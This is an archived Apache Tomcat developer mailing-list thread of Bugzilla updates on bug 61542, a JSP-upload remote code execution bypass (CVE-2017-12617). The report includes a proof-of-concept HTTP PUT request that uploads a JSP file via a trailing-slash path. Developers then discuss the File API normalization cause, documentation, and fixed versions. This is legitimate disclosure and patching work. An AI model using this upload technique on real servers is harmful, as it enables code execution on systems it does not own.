You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@tomcat.apache.org by bu...@apache.org on 2017/09/20 06:38:18 UTC
[Bug 61542] New: Apache Tomcat Remote Code Execution via JSP Upload
bypass for CVE-2017-12615
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
Bug ID: 61542
Summary: Apache Tomcat Remote Code Execution via JSP Upload
bypass for CVE-2017-12615
Product: Tomcat 7
Version: 7.0.81
Hardware: PC
Status: NEW
Severity: normal
Priority: P2
Component: Servlet & JSP API
Assignee: dev@tomcat.apache.org
Reporter: shengqi158@gmail.com
Target Milestone: ---
Description:
When running on Windows with HTTP PUTs enabled (e.g. via setting the
readonly initialisation parameter of the Default to false) it was
possible to upload a JSP file to the server via a specially crafted
request. This JSP could then be requested and any code it contained
would be executed by the server.
the poc is like this:
PUT /1.jsp/ HTTP/1.1
Host: 192.168.3.103:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.3.103:8080/examples/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94
Connection: close
Content-Length: 26
<% out.println("hello");%>
it is the bypass for CVE-2017-12615
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload
bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #5 from Mark Thomas <ma...@apache.org> ---
Maybe a better check would be that, given the path will already have been
normalised, if the the absolute path ends with the given name.
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
Re: [Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload
bypass
Posted by Mark Thomas <ma...@apache.org>.
On 17/01/2020 14:25, Christopher Schultz wrote:
> Mark,
>
> On 1/16/20 8:11 AM, Mark Thomas wrote:
>> On 16/01/2020 12:00, bugzilla@apache.org wrote:
>>> https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
>>>
>>> --- Comment #13 from Sam <ge...@gmail.com> ---
>
>> This idiot has been blocked from BZ for spam and the spam comment
>> deleted.
>
> The previous comment also appears to be the same kind of spam.
Thanks. That idiot has been blocked too and their spam comments deleted.
Mark
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
Re: [Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload
bypass
Posted by Christopher Schultz <ch...@christopherschultz.net>.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Mark,
On 1/16/20 8:11 AM, Mark Thomas wrote:
> On 16/01/2020 12:00, bugzilla@apache.org wrote:
>> https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
>>
>> --- Comment #13 from Sam <ge...@gmail.com> ---
>
> This idiot has been blocked from BZ for spam and the spam comment
> deleted.
The previous comment also appears to be the same kind of spam.
- -chris
-----BEGIN PGP SIGNATURE-----
Comment: Using GnuPG with Thunderbird - https://www.enigmail.net/
iQIzBAEBCAAdFiEEMmKgYcQvxMe7tcJcHPApP6U8pFgFAl4hw9oACgkQHPApP6U8
pFhV0A/+NEh0JZgJSqKULZ/eE9Qww3KhvMQfUZsC8OdjabXJI3G2RJlwT6e86u7C
KVkYAb8s2hAoQO8HAMnGLTO2VA2jsPgohM03aOaVSsK1U97LuuX9ObWbuiGQwSso
LYJcHqK2NaGEKIxiX8Y8Ywe1X33UKyUVTgP/nfmC/PBJ7BDPmf4tY3ZVqSVY1jnd
0ErVz10vaOqmeDX48YCjgmpU9j2VN9U1NFvwMtSBz2+5uKMj4AsbQdlHvijggRWQ
GRGsNpATJrWfHRUt6v6wcEGQYBMlorUAkutpuzS5FTQ9mce2Cvrae5FNXHugP8/K
J+OOO+sTp6KBnug3shcf0NAKIGah8FRNjR8O+S0SIcSmRrVfkoblAlk1axp3IojD
166+w5OBnBSSpcAuG5kVq+DuPdiS5bEpJnG5zmcBOhL6Zm5Nam2GS5ClJ4voeZC4
76E0tcx4r3wNpUYagCmYAi5TLQfBgYSFJjtivqoVFzJQf1H1ePTDLuoZ1A6T1j14
SOjn5hz9rRZQRfeRrfC9JMyWUBgJOdUmGJHd+zrB3mgAxv/B/aPo9zIaYFIUjWnY
AwaJWySGG8X6R47QjacfGmoWn8SsU+4r4h88hpYfyGvLeD3RF7mC8Yyu3VSLlk8a
PBHmv0bCLZ0Pb31O92KcQmCYLqfFBGewaIj8IF2q4v42EyBnYlU=
=Me0y
-----END PGP SIGNATURE-----
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
Re: [Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload
bypass
Posted by Mark Thomas <ma...@apache.org>.
On 16/01/2020 12:00, bugzilla@apache.org wrote:
> https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
>
> --- Comment #13 from Sam <ge...@gmail.com> ---
This idiot has been blocked from BZ for spam and the spam comment deleted.
Mark
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload
bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #13 from Sam <ge...@gmail.com> ---
Hello Mark, is this issue fixed?
Best regards,
Sam.
https://getpeople.io
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload
bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #7 from Peter Stöckli <pe...@alphabot.com> ---
Isn't the mere existence of the readonly parameter also part of the problem?
https://tomcat.apache.org/tomcat-7.0-doc/default-servlet.html
It is currently documented as "Is this context "read only", so HTTP commands
like PUT and DELETE are rejected? [true]"
But it holds more "surprises". IMHO this parameter should NEVER be set to
false. Maybe it can be removed or the documentation of this parameter can be
improved?
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
[Bug 61542] none
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
xxlegend <sh...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
Summary|Apache Tomcat Remote Code |none
|Execution via JSP Upload |
|bypass for CVE-2017-12615 |
OS| |All
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload
bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #3 from Mark Thomas <ma...@apache.org> ---
The File API certainly isn't helping.
When a file named '/test.jsp' exists '/test.jsp/' -> '/test.jsp' is surprising.
Less so when it doesn't exist because it could be referring to a directory and
both forms are valid for a directory.
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload
bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
ann chriss <an...@yahoo.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
OS| |All
--- Comment #13 from ann chriss <an...@yahoo.com> ---
thanks
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
[Bug 61542] none
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #1 from Mark Thomas <ma...@apache.org> ---
This additional issue has been confirmed and CVE-2017-12617 has been allocated.
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload
bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
Guillermo Grandes <gu...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
CC| |guillermo.grandes@gmail.com
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload
bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
Mark Thomas <ma...@apache.org> changed:
What |Removed |Added
----------------------------------------------------------------------------
Status|NEW |RESOLVED
Resolution|--- |FIXED
--- Comment #11 from Mark Thomas <ma...@apache.org> ---
Fixed in:
- trunk for 9.0.0 onwards
- 8.5.x for 8.5.22 onwards
- 8.0.x for 8.0.47 onwards
- 7.0.x for 7.0.82 onwards
I'm on the fence regarding the suggested documentation change. If a sysadmin
doesn't understand what enabling HTTP PUT and/or DELETE means I don't think any
realistic amount of documentation is going to result in a correctly secured
Tomcat instance.
Maybe what we need is a link to the security page from every setting called out
in the security page. Something to ponder / discuss on the dev@ list.
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload
bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #14 from Mike Smith <rs...@gmail.com> ---
Hello Mark, does this issue fixed already? Or any source? Thanks
Mike S.
http://www.insolvencyhelpline.co.uk/"
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload
bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #6 from Mark Thomas <ma...@apache.org> ---
Nope. That will fail for directories where the trailing '/' is provided since
it will have been removed from the absolute and canonical paths.
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload
bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #8 from Remy Maucherat <re...@apache.org> ---
(In reply to Peter Stöckli from comment #7)
> Isn't the mere existence of the readonly parameter also part of the problem?
>
> https://tomcat.apache.org/tomcat-7.0-doc/default-servlet.html
> It is currently documented as "Is this context "read only", so HTTP commands
> like PUT and DELETE are rejected? [true]"
>
> But it holds more "surprises". IMHO this parameter should NEVER be set to
> false. Maybe it can be removed or the documentation of this parameter can be
> improved?
Have you ever heard of WebDAV ? Obviously if we were writing Tomcat today, we
would never bother implementing it. Also obviously, nobody running a public
server should enable it, secured or not. But it's not going to be removed
either.
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload
bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #4 from Remy Maucherat <re...@apache.org> ---
Well, every time there's surprising normalization, it causes security issues so
it's a big API mistake :) The normalization of the input path should only
happen for getCanonicalPath, that's the whole point.
Of course, I probably knew about this behavior a while ago then since there's
the '/' check for get. On the plus side the issue is not that serious (readonly
needed) so it's not the end of the world.
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload
bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
Remy Maucherat <re...@apache.org> changed:
What |Removed |Added
----------------------------------------------------------------------------
Summary|none |Apache Tomcat Remote Code
| |Execution via JSP Upload
| |bypass
--- Comment #2 from Remy Maucherat <re...@apache.org> ---
Hum, actually this looks like a File API issue. With the (correct) /1.jsp/ path
input, (new File(name)).getPath() just strips the trailing '/', and of course
getAbsolutePath, which is used for the safety net check, also does it. There's
a problem there.
Restoring the BZ name since it's pointless.
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload
bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #10 from Peter Stöckli <pe...@alphabot.com> ---
Created attachment 35361
--> https://bz.apache.org/bugzilla/attachment.cgi?id=35361&action=edit
proposal to improve doc of the readonly flag
First of all: your work is greatly appreciated!
And I didn't know that Tomcat is also widely used as WebDAV server. So it makes
sense to keep that option.
Attached is a patch that could help improve the documentation of the readonly
flag.
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload
bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #9 from Mark Thomas <ma...@apache.org> ---
Indeed. Lots of folks run Tomcat with WebDAV on internal sites. Hard-coding
readonly to true is simply not an option.
Regarding better documentation, patches welcome.
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload
bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
--- Comment #12 from Castro B <ca...@gmx.com> ---
Hello Mark, does this issue fixed already? Or any source? Thanks
Castro B.
http://buywebtrafficexperts.com/"
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload
bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
cailei <ca...@infosec.com.cn> changed:
What |Removed |Added
----------------------------------------------------------------------------
Component|Servlet & JSP API |Catalina
Version|7.0.81 |9.0.0.M22
OS|All |Windows Server 2012 R2
Product|Tomcat 7 |Tomcat 9
Target Milestone|--- |-----
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
[Bug 61542] Apache Tomcat Remote Code Execution via JSP Upload
bypass
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
xing <ga...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
Component|Catalina |Catalina
Version|9.0.0.M22 |8.5.15
Target Milestone|----- |----
Product|Tomcat 9 |Tomcat 8
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org